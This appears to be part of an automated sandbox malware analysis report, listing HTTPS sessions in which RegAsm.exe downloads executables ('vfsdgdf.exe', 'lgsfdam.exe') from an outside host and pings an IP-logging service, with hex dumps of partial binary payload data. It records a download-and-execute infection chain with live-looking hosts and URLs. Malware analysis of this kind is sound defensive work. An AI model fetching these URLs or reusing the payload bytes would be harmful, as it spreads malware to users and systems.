                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC16384INData Raw: 89 d7 4c 8b 42 08 4c 39 c3 7d e8 48 8b 12 44 0f b6 0c 1a 41 80 f9 3d 75 da 31 c9 eb 0d 31 c0 31 db 48 83 c4 10 5d c3 48 ff c1 48 39 cb 7e 39 44 0f b6 0c 0a 76 57 44 0f b6 14 01 45 38 ca 74 e7 45 8d 59 bf 41 80 fb 19 77 04 41 83 c1 20 45 8d 5a bf 41 80 fb 19 77 09 41 83 c2 20 0f 1f 44 00 00 45 38 d1 74 c1 eb 8b 49 29 d8 49 8d 48 ff 48 89 ce 48 f7 d9 48 c1 f9 3f 48 8d 7b 01 48 21 cf 48 8d 04 3a 48 89 f3 48 83 c4 10 5d c3 48 89 c8 48 89 d9 e8 a9 4c 06 00 48 8d 05 61 76 a9 00 bb 16 00 00 00 e8 f8 14 03 00 90 48 89 44 24 08 48 89 5c 24 10 e8 88 29 06 00 48 8b 44 24 08 48 8b 5c 24 10 e9 f9 fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 8d 64 24 80 4d 3b 66 10 0f 86 5f 03 00 00 55 48 89 e5 48 81 ec f8 00 00 00 48 89 84 24
                                                                                                                                                                                                                                Data Ascii: LBL9}HDA=u111H]HH9~9DvWDE8tEYAwA EZAwA DE8tI)IHHHH?H{H!H:HH]HHLHavHD$H\$)HD$H\$Ld$M;f_UHHH$
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC1024INData Raw: 8d 44 24 38 e8 38 4d 02 00 83 3d 21 cd 58 01 01 b9 00 00 00 00 ba 04 00 00 00 48 0f 4f ca 48 89 4c 24 10 48 8b 54 24 28 48 8b 5c 24 30 31 c0 eb 18 48 83 c4 58 5d c3 48 ff c0 48 8b 4c 24 10 48 8b 54 24 28 48 8b 5c 24 30 48 8b 33 0f ba e6 00 72 21 48 89 74 24 20 48 89 f0 48 83 ce 01 f0 48 0f b1 33 40 0f 94 c6 40 84 f6 75 6b 48 8b 74 24 20 31 c0 48 89 44 24 18 48 39 c8 7c 32 48 8d 79 01 48 39 f8 7d 69 48 8d 05 1c be af 00 48 89 04 24 e8 8b e8 05 00 45 0f 57 ff 4c 8b 35 c0 cf 58 01 65 4d 8b 36 4d 8b 36 48 8b 44 24 18 eb 88 c7 04 24 1e 00 00 00 e8 06 04 06 00 45 0f 57 ff 4c 8b 35 9b cf 58 01 65 4d 8b 36 4d 8b 36 48 8b 44 24 18 e9 60 ff ff ff 48 8d 44 24 38 0f 1f 44 00 00 e8 db 4d 02 00 48 83 c4 58 5d c3 48 89 f8 48 8b 7a 30 49 89 f0 48 83 e6 fe 48 89 b7 38 02
                                                                                                                                                                                                                                Data Ascii: D$88M=!XHOHL$HT$(H\$01HX]HHL$HT$(H\$0H3r!Ht$ HHH3@@ukHt$ 1HD$H9|2HyH9}iHH$EWL5XeM6M6HD$$EWL5XeM6M6HD$`HD$8DMHX]HHz0IHH8
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC16384INData Raw: 90 c3 48 8d 05 f8 76 aa 00 bb 1d 00 00 00 e8 8e d1 02 00 48 8b 44 24 18 48 8b 40 30 c6 80 e5 00 00 00 00 48 83 c4 28 5d c3 b8 80 96 98 00 e8 ae 98 02 00 48 8b 0d 4f 57 6d 00 48 8b 09 48 89 0c 24 48 c7 44 24 08 00 00 00 00 e8 d2 00 06 00 45 0f 57 ff 4c 8b 35 07 cc 58 01 65 4d 8b 36 4d 8b 36 48 8b 4c 24 18 48 8b 5c 24 38 48 8b 13 48 85 d2 74 b6 eb 9e 48 8d 05 c5 b3 a8 00 bb 13 00 00 00 e8 1b d1 02 00 90 48 89 44 24 08 e8 b0 e5 05 00 48 8b 44 24 08 e9 c6 fe ff ff cc cc cc cc cc cc 55 48 89 e5 48 83 ec 38 49 8b 4e 30 48 89 4c 24 20 48 8b 4c 24 20 48 89 c2 31 c0 f0 48 0f b1 0a 0f 94 c1 84 c9 74 6b 4c 89 74 24 30 48 85 db 7d 2d 49 8b 4e 30 c6 81 e5 00 00 00 01 48 8b 0d a5 56 6d 00 48 83 39 00 0f 85 16 02 00 00 48 c7 c0 ff ff ff ff e8 e7 97 02 00 e9 bc 01 00 00
                                                                                                                                                                                                                                Data Ascii: HvHD$H@0H(]HOWmHH$HD$EWL5XeM6M6HL$H\$8HHtHHD$HD$UHH8IN0HL$ HL$ H1HtkLt$0H}-IN0HVmH9H
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC1024INData Raw: c3 41 83 e0 07 47 0f b6 24 10 41 80 fc 01 76 d6 41 80 fc 04 74 d0 41 83 e3 07 44 0f b6 66 50 4d 89 e5 4d 0f af e3 4d 89 d7 4f 8d 24 14 4d 8d 64 24 08 8b 4e 54 0f ba e1 00 73 04 4d 8b 24 24 44 88 4c 24 1f 4c 89 64 24 48 0f b6 7e 51 49 0f af fb 4a 8d 3c ef 4a 8d 3c 17 48 8d 7f 08 48 89 7c 24 38 48 83 fa ff 0f 84 2b 01 00 00 44 0f b6 53 08 41 f6 c2 08 0f 85 1c 01 00 00 4c 89 44 24 30 0f ba e1 02 73 07 b9 01 00 00 00 eb 43 48 8b 4e 30 48 8b 51 18 48 8b 0a 4c 89 e0 48 89 c3 ff d1 48 8b 54 24 20 48 8b 5c 24 50 48 8b 74 24 40 48 8b 7c 24 38 4c 8b 44 24 30 44 0f b6 4c 24 1f 4c 8b 64 24 48 4c 8b 7c 24 58 89 c1 48 8b 44 24 70 84 c9 75 37 0f b6 48 4a ff c9 49 89 d2 48 d3 ea 47 0f b6 1c 38 41 83 e3 01 80 f9 40 4d 19 ed 49 21 d5 4d 39 eb 0f 84 9f 00 00 00 4c 89 d2 48
                                                                                                                                                                                                                                Data Ascii: AG$AvAtADfPMMMO$Md$NTsM$$DL$Ld$H~QIJ<J<HH|$8H+DSALD$0sCHN0HQHLHHT$ H\$PHt$@H|$8LD$0DL$Ld$HL|$XHD$pu7HJIHG8A@MI!M9LH
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC2368INData Raw: 4b 08 83 e1 f7 88 4b 08 83 3d 02 8b 58 01 00 74 0c 48 8b 4b 18 e8 67 c1 05 00 49 89 0b 48 c7 43 18 00 00 00 00 48 c7 43 20 00 00 00 00 66 c7 43 0a 00 00 48 c7 03 00 00 00 00 e8 e2 6f 05 00 48 8b 4c 24 30 89 41 0c 48 8b 41 28 48 85 c0 74 35 83 3d ba 8a 58 01 00 74 20 48 8b 10 0f 1f 44 00 00 e8 5b c1 05 00 49 89 13 48 8b 50 08 49 89 53 08 48 8b 50 10 49 89 53 10 44 0f 11 38 48 c7 40 10 00 00 00 00 0f b6 59 09 48 8b 51 10 48 8b 44 24 28 48 89 d1 e8 a7 e5 ff ff 48 85 db 74 2a 48 8b 4c 24 30 48 8b 51 28 84 02 83 3d 60 8a 58 01 00 74 10 e8 e9 c0 05 00 49 89 1b 48 8b 72 10 49 89 73 08 48 89 5a 10 eb 05 48 8b 4c 24 30 0f b6 51 08 f6 c2 04 75 16 48 8d 05 99 c1 a8 00 bb 15 00 00 00 e8 99 8d 02 00 48 8b 4c 24 30 0f b6 41 08 83 e0 fb 88 41 08 48 83 c4 18 5d c3 48 ff
                                                                                                                                                                                                                                Data Ascii: KK=XtHKgIHCHC fCHoHL$0AHA(Ht5=Xt HD[IHPISHPISD8H@YHQHD$(HHt*HL$0HQ(=`XtIHrIsHZHL$0QuHHL$0AAH]H
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC16384INData Raw: 44 0f b6 44 24 1f 4c 8b 4c 24 38 4c 8b 94 24 90 00 00 00 4c 8b 5c 24 28 4a ff 44 0c 50 44 0f b6 60 50 4e 01 64 0c 58 44 0f b6 60 51 4e 01 64 0c 60 44 89 c1 4c 8b 4c 24 20 e9 6d fc ff ff 4c 89 c8 b9 02 00 00 00 e8 b6 bb 05 00 48 8d 05 d7 b1 a7 00 bb 0d 00 00 00 e8 05 84 02 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 e8 90 98 05 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 90 e9 7b fa ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 9e 00 00 00 55 48 89 e5 48 8b 50 20 48 8d 72 01 48 89 70 20 48 81 c2 01 04 00 00 48 39 d1 48 0f 42 d1 eb 07 48 ff c6 48 89 70 20 48 8b 70 20 48 39 d6 74 19 0f b7 7b 52 48 0f af fe 48 03 78 18 0f b6 3f 83 c7 fe 90 40 80 ff 03 72 d7 48 39 f1 75 4e 83 3d d1 80 58 01
                                                                                                                                                                                                                                Data Ascii: DD$LL$8L$L\$(JDPD`PNdXD`QNd`DLL$ mLHHD$H\$HL$HD$H\$HL${I;fUHHP HrHp HH9HBHHp Hp H9t{RHHx?@rH9uN=X


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                6192.168.2.949730162.241.61.2184436388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC198OUTGET /vfsdgdf.exe HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: nerv.com.pe
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:43 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                Last-Modified: Fri, 20 Sep 2024 21:15:00 GMT
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 423328
                                                                                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC7943INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 32 e5 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1c 06 00 00 08 00 00 00 00 00 00 ee 3a 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL2f: @@ `
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC8000INData Raw: c4 0f b7 74 ab d0 4a 21 fc ad e7 fc 29 13 28 11 95 ee ca cf 23 98 c5 84 24 0c 88 81 33 93 c1 c4 5e f4 8f c3 fa c7 14 3c a5 09 ae db 0a 48 95 7a e8 70 12 f7 28 a7 bd 5a 15 dd 65 94 7f 03 27 f9 39 63 7c cc ef 29 39 e2 e7 50 8d 32 4c 60 ac 4c 0f 70 84 c4 45 bc 21 bf bb ec f3 d9 65 be df 80 59 2c f4 72 5f b4 e6 d5 9f 1f d3 7f 7e 07 ae 7e a6 ae 36 51 c4 fc 80 07 53 fb 23 9d ae 3a 87 4a d9 0b 02 49 e4 8a 01 b7 f5 48 94 9e 4b 71 74 49 ac c3 c3 38 0e a6 75 98 2e f4 52 3d b3 e8 eb 80 30 1e e0 1c 1b df 0d 6f 92 e9 8c 0e cd 53 7b cf 39 eb 9c b7 b3 c1 e7 53 73 d1 42 e9 1d f1 6b 1c 22 04 6f 10 a4 a6 8d 4e ff 02 18 0e ac cf ef 29 c2 20 63 d3 4a 15 3f cd 51 71 39 6b 3f 8a 5e 53 dd 40 b1 44 6a 5e 82 70 c2 af e4 af 90 e6 78 34 ba a7 6b 42 38 64 d0 41 e3 2d 2a 1f 6f 12 41
                                                                                                                                                                                                                                Data Ascii: tJ!)(#$3^<Hzp(Ze'9c|)9P2L`LpE!eY,r_~~6QS#:JIHKqtI8u.R=0oS{9SsBk"oN) cJ?Qq9k?^S@Dj^px4kB8dA-*oA
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC8000INData Raw: 46 a4 73 b6 d2 37 64 bb 6e f0 75 f3 9f e1 42 b3 83 d9 29 7d d0 44 bf 95 1c 24 7b c4 96 8c 38 52 f0 d7 62 61 8e 5b 80 c7 2c 92 0e 64 f9 b4 c2 f4 6d ab 9e ad a0 a2 27 d3 bb 9b 40 8a ba 79 82 94 50 0c 6e ab 07 f0 69 f4 f7 ab 60 ed 16 7e d3 4d f8 f1 34 32 c1 07 9d 09 dc e9 e1 05 d1 fa cb bc f6 17 8f 4a 53 f7 93 ab d7 6c 95 13 76 d5 b9 a0 2e 7f c3 40 b0 2d b9 1d f4 f2 3a d0 ce ce 3e b3 20 4f 84 76 bd cd c1 76 ce 0a 37 32 bc 2a c7 3a dd e1 96 12 ac a0 36 3e 0f 2b e3 e9 20 a9 e3 6c f6 e1 e6 9a 3e d4 f6 c9 59 1c 1d c4 aa d4 79 6e fb de 55 8e 49 53 6f 4a bc ec 13 48 3f 67 44 dd c0 23 26 61 b2 61 90 8c 12 5d 1e 2e df 3a a7 22 76 65 0d 75 03 df 60 4a 4c 60 1b f2 88 66 82 9e 7d fe 5c 4d 54 57 2f ba 82 c5 a8 f1 65 b5 ee a9 55 e4 9d 83 c1 22 0b 26 3c 56 93 14 cd 8f 9e
                                                                                                                                                                                                                                Data Ascii: Fs7dnuB)}D${8Rba[,dm'@yPni`~M42JSlv.@-:> Ovv72*:6>+ l>YynUISoJH?gD#&aa].:"veu`JL`f}\MTW/eU"&<V
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC8000INData Raw: ed 0c d9 ee 13 d4 76 b0 bd 1b 6b 0f 65 6e ee 8b 1d f0 20 b4 7d fe b8 22 b6 7e a1 2e 24 18 8b 77 c8 cb 0c 6b f9 2d 54 15 fb ce d4 b3 b8 0d 70 0a 1e 88 2e 47 9d 18 9a 29 9d 62 9b a1 73 c7 6e 96 c0 83 25 eb e8 69 09 1e a6 cf ad 60 c6 93 49 99 69 5c 6b 61 66 70 4d 18 b8 39 43 c6 b1 97 59 81 4b 83 80 5c c7 7d f3 90 e7 ba 5b 84 f5 f9 b4 b3 1b 3a bd 00 75 c1 08 43 ea 76 6d db c4 cb 10 62 77 be 95 3b e9 f6 32 ff fe e9 ae 0c 53 e0 41 32 50 ff 27 0e a3 9a be 6e 5c db 5f a8 a5 cf 48 4c d3 63 0d 89 0b 51 9e 18 61 91 5b 67 72 3c 05 f2 11 c8 b7 30 4c ff dc 09 63 26 60 33 db 4a 2d c0 73 25 6e 0b ad 5a 9e a7 7f d0 6a 4e 75 a3 21 b2 00 0a 4c 56 c9 af 0c 45 5d c7 af 0e 6c 63 ec a5 79 b3 b9 4a d2 c7 93 c7 07 1d f4 ff 02 47 0b 55 da d3 a0 a9 fc e0 cd 15 f6 bf c4 23 8c d0 02
                                                                                                                                                                                                                                Data Ascii: vken }"~.$wk-Tp.G)bsn%i`Ii\kafpM9CYK\}[:uCvmbw;2SA2P'n\_HLcQa[gr<0Lc&`3J-s%nZjNu!LVE]lcyJGU#
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC8000INData Raw: 1b 16 ef e4 fb 69 9b 90 d5 20 e4 8e 4d d2 65 02 87 48 e3 a3 d2 a1 bb 28 22 e1 d8 fb ec 67 23 ad 26 a3 e1 f3 c2 83 ab 88 49 fb be eb 76 98 5a ca 5b c9 12 af d3 10 cb a8 d0 4f fa a1 db 9d e8 15 79 95 7d 95 87 50 36 f1 55 b9 11 00 5f b9 a1 db 3d 51 6c 10 6c 1b 8c f2 02 5f 7b 33 78 09 3e fc d9 75 08 01 62 ee c0 8b 33 bc 0c e2 33 60 2b 4a c4 74 78 36 77 a3 72 53 cd 92 a5 a6 3d da 03 a4 22 be 20 df fd f9 ad 18 6e 15 ae 97 49 f5 d4 a1 65 c4 d8 70 b5 92 ff d6 ef 4f 30 8b 93 a3 5e 09 3d e7 55 54 06 a1 50 71 27 a6 36 e0 79 47 df a0 5f 20 1d f4 ac d1 1e 7a f7 c4 1b 81 09 7c dd 26 d6 81 26 a5 d5 4c 1e cd 71 ef 4a 33 a7 6d 3d fe 0f 6a 83 09 39 4f 3b 4b b8 fc 48 92 6e 3a 34 b2 63 3c b5 5c a8 b1 8f 44 87 09 0f cb d0 ec 20 d6 56 04 58 08 7b 75 cc fd fc bd 1a b1 78 60 20
                                                                                                                                                                                                                                Data Ascii: i MeH("g#&IvZ[Oy}P6U_=Qll_{3x>ub33`+Jtx6wrS=" nIepO0^=UTPq'6yG_ z|&&LqJ3m=j9O;KHn:4c<\D VX{ux`
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC8000INData Raw: 39 63 44 fc 39 55 42 e9 1f fb a3 f7 47 6e 00 5b 91 ab ef c4 4e aa b1 d2 3c 7e 14 59 e4 e3 32 e1 7b 8c 42 a4 26 cb bc cd de 76 45 ee e9 fc ce cc e8 1d 6c 6b 51 0a ca b9 b2 dc 68 3d c0 43 78 be 7b e6 02 6e ce a9 ac 9e 54 66 80 99 73 82 73 e4 1c 63 91 84 0d 68 dc 0d e6 8e 16 a3 0a 2e 67 7f 34 80 0b 32 f8 f8 bd d7 9f 62 18 67 12 d4 63 16 ac 8a 0f 41 f2 8b 2e 91 ff 57 ee ab 1b c8 57 e6 65 8a 3b 0f 38 2c 9c 7d f6 8c 35 75 90 34 2b 34 8f 0b 54 2f 09 17 a5 a4 cf df cb b2 76 23 02 ff e3 7d 60 0b 8c c5 70 11 df ba 3c f7 ad 2b b7 21 09 95 4d d1 0e 8c 44 12 ce f7 0a 69 30 98 01 1a 90 9e d3 f3 83 6f 8e 82 22 bf ec 8c c2 8f e3 88 40 65 f5 6a a7 5c 26 a8 28 69 4e f3 b3 78 70 4d df 17 f7 8b 63 6b be e3 a0 03 38 6a 09 d2 6e 48 88 11 33 61 26 4b 74 c0 87 33 1e 2c 10 b5 61
                                                                                                                                                                                                                                Data Ascii: 9cD9UBGn[N<~Y2{B&vElkQh=Cx{nTfssch.g42bgcA.WWe;8,}5u4+4T/v#}`p<+!MDi0o"@ej\&(iNxpMck8jnH3a&Kt3,a
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC8000INData Raw: cb e1 e5 7b 46 31 f1 5d 84 0a 1a 85 27 5e 55 f9 cf 93 6f 6f 1a f0 f0 81 da 75 60 95 3b e3 f6 58 73 ef 1c 03 64 49 bd ef a9 ff bf a6 f4 98 5d b9 44 76 64 be ca b0 99 33 9a 08 6a c7 4f 41 d9 8e 31 b6 97 82 37 bb be f5 8e 92 ed 91 64 20 5e e9 9e 55 9f 75 73 e8 62 e0 fc 7a b8 b6 95 5b 25 97 06 78 8a c2 67 a8 ef 97 96 48 ab 8f b4 62 97 22 10 a0 e4 d5 50 7b 8e c8 17 3b 44 7f f9 18 38 51 f9 40 73 96 af dd cd 7c 56 d5 80 f2 cb ad 70 be 6c 0e d8 e9 58 4c 2e 73 c1 77 32 9b 23 82 55 07 96 50 ac c1 76 77 26 d8 d6 1e c6 9d 94 50 56 16 d7 1b e7 77 c5 2f b2 4e e5 d2 a0 6a 9c 60 ba 93 99 50 a6 93 ac 39 de 6e 8d 9c b2 c2 7f 7a 74 ee 15 10 e1 3f 68 08 e4 3b 8c 45 f3 cb 06 55 ea 9a 00 af ba 26 57 39 03 13 11 4b 73 60 a8 82 ab b4 bd 61 e2 93 c5 17 57 33 29 5a f2 4d 09 bf d3
                                                                                                                                                                                                                                Data Ascii: {F1]'^Uoou`;XsdI]Dvd3jOA17d ^Uusbz[%xgHb"P{;D8Q@s|VplXL.sw2#UPvw&PVw/Nj`P9nzt?h;EU&W9Ks`aW3)ZM
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC8000INData Raw: 02 0a de 83 ee 67 ae e4 3b 19 3d d3 45 04 65 b6 fb 16 0d c5 c9 8c 42 10 1b 50 59 34 6b d3 32 80 8c bf 6a 89 66 45 9e 84 a6 64 ca 23 5f 8c 55 e9 f8 f4 c0 34 ab a6 3e d6 83 73 d8 32 d4 66 08 04 a9 cd a2 f3 29 bc 0c a9 ce 9b 04 97 9c 30 4e 92 ac 47 0d d7 c6 e4 3c e4 47 20 b0 4b 72 48 63 18 6d 85 9b 1e b2 3f da b2 c2 0e db 63 4a 3d b4 3b f5 5b bc bf e2 40 da 85 d5 52 11 8f fd 52 c2 54 7e cc 60 c8 f0 5b 9f 07 cf 71 fb 6c c7 c8 54 29 0c fe 5c c2 a6 97 43 cb 5f ac 00 9b 9a 9a 93 d9 f3 e6 14 48 c9 ce 1b bf c1 5a e8 d7 4e d9 e7 96 67 2c dc 32 b3 00 d1 1a fa 43 46 22 77 98 df 41 26 7b 4b 2b a2 7b 75 8d 4a 6b 35 1a 2a 92 c3 8f 12 f2 0f 6a 27 ee b6 21 b8 0d ac 94 16 e6 66 98 47 58 57 6f e4 03 cc c7 79 72 b6 87 24 16 d7 5b 90 28 dd 3d d4 ae a9 8d a5 da 4d ee f6 3f 66
                                                                                                                                                                                                                                Data Ascii: g;=EeBPY4k2jfEd#_U4>s2f)0NG<G KrHcm?cJ=;[@RRT~`[qlT)\C_HZNg,2CF"wA&{K+{uJk5*j'!fGXWoyr$[(=M?f
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC8000INData Raw: 95 20 3d 81 93 d0 1b ff ac 30 6c 1f 98 b1 a7 ce 9b a6 49 32 80 aa f2 9c 7b 84 83 14 4d 83 07 97 8c 86 86 3e cd 74 54 98 6d 3d 29 ce 1b 6a f0 47 a4 4d ed cf 07 d5 aa 83 ca d4 13 2d b4 bf 6d e9 9e c1 18 40 10 5a 9b b7 cf a7 6e 50 4d 70 fc 70 4c a3 17 15 c6 bc f5 1c 36 cb 2c 34 72 3d 01 7f df 11 4f 31 6d e2 b2 ba 21 cf 42 d7 89 80 c9 59 89 42 29 55 12 50 fb 3b 2f 27 11 20 9a ef da b4 b4 84 08 f2 e0 3a 46 d7 70 cb 59 05 f0 41 8c 1d 76 37 8c 04 46 24 e8 10 99 15 4a 0b a9 9d 1e 94 6c 40 63 f6 42 e3 3a 96 8b d6 54 32 65 f9 42 ed 9c 4d 15 16 ed db a8 25 41 a1 f8 a6 d8 9c dc cd 84 77 57 2b d4 60 f7 84 f0 ae 86 c1 68 06 44 4f f3 c4 db 67 39 95 65 2a f5 13 82 da 8b 02 e3 f9 0d cd 3e b5 42 65 f0 40 0f 6e eb c6 59 6f 7a b9 9d 81 3a d5 65 e2 4d e3 42 59 6f e5 9b c9 af
                                                                                                                                                                                                                                Data Ascii: =0lI2{M>tTm=)jGM-m@ZnPMppL6,4r=O1m!BYB)UP;/' :FpYAv7F$Jl@cB:T2eBM%AwW+`hDOg9e*>Be@nYoz:eMBYo
                                                                                                                                                                                                                                2024-09-21 11:33:43 UTC8000INData Raw: 6a 5f a6 25 2a 96 02 47 8c ed 89 de 3c 72 ba 69 63 3e 89 9c 33 85 90 22 ae 3e 60 f6 2b a3 53 5a d0 c5 fa d1 f0 cd ac f9 5e 88 71 34 ed 98 55 2a 0a 2c a9 1b e3 86 38 8f 9a 9d fe 83 2b ea 4e ef 74 6d 9e ad 6a 56 56 9d a3 bd 9e 1d bd 6b 0e 56 69 df b3 79 72 ef 08 83 af 0e 4d b0 1e bc 7a 1c a3 6b 8b 48 9c 87 7b 38 c4 91 d4 d7 f8 39 da c8 1b b0 ca 8d 12 a1 e8 47 79 1e 50 83 3d f5 2a c2 a8 f8 92 44 6e 03 b1 3c ff a8 a5 2f 81 23 7a 5a d0 10 61 80 81 a4 02 11 62 db 15 3c 18 30 e7 2a 62 70 29 88 32 eb 08 0a d3 4e 2c f7 83 f8 e2 ff 7f a2 d2 ad bd b7 13 a5 8d 99 00 b3 e3 ed a2 b2 2f ac 59 1e a1 61 7c 01 71 de 1d 8c ad 5a 86 60 0b ef 6b 73 68 77 8c 41 68 6e 08 2d 65 04 32 bd db 16 52 8c a9 40 bb 49 97 35 3a ce 5e e7 69 e6 da c1 4c fd ea 71 4b 4c 78 c8 1c f2 7b ee bc
                                                                                                                                                                                                                                Data Ascii: j_%*G<ric>3">`+SZ^q4U*,8+NtmjVVkViyrMzkH{89GyP=*Dn</#zZab<0*bp)2N,/Ya|qZ`kshwAhn-e2R@I5:^iLqKLx{


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                7192.168.2.949739104.26.2.464436388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:34:04 UTC196OUTGET /1nhuM4.js HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: iplogger.org
                                                                                                                                                                                                                                2024-09-21 11:34:04 UTC1000INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:04 GMT
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                memory: 0.4308929443359375
                                                                                                                                                                                                                                expires: Sat, 21 Sep 2024 11:34:04 +0000
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                CF-Cache-Status: BYPASS
                                                                                                                                                                                                                                Set-Cookie: 40589004137263905=2; expires=Sun, 21 Sep 2025 11:34:04 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                Set-Cookie: clhf03028ja=8.46.123.33; expires=Sun, 21 Sep 2025 11:34:04 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3YPah2QZx%2BrdGyyEfzmilfiWPC%2BygnHPoIfKq4LvPx4%2BoD%2B%2B0TRuVjFx2jjnLbga%2BDvENLf2YDAEWL1zDCz%2F15RXao2cb6iubtHP8cNKi8z8phLtYwy5s10ksrrv4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8c69be75ca377c78-EWR
                                                                                                                                                                                                                                2024-09-21 11:34:04 UTC122INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                                                                Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                                                                                                                                                                                                                2024-09-21 11:34:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                8192.168.2.949754162.241.61.2184436524C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:34:33 UTC73OUTGET /lgsfdam.exe HTTP/1.1
                                                                                                                                                                                                                                Host: nerv.com.pe
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:34:33 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:33 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                Last-Modified: Fri, 20 Sep 2024 21:15:04 GMT
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 390560
                                                                                                                                                                                                                                Content-Type: application/x-msdownload
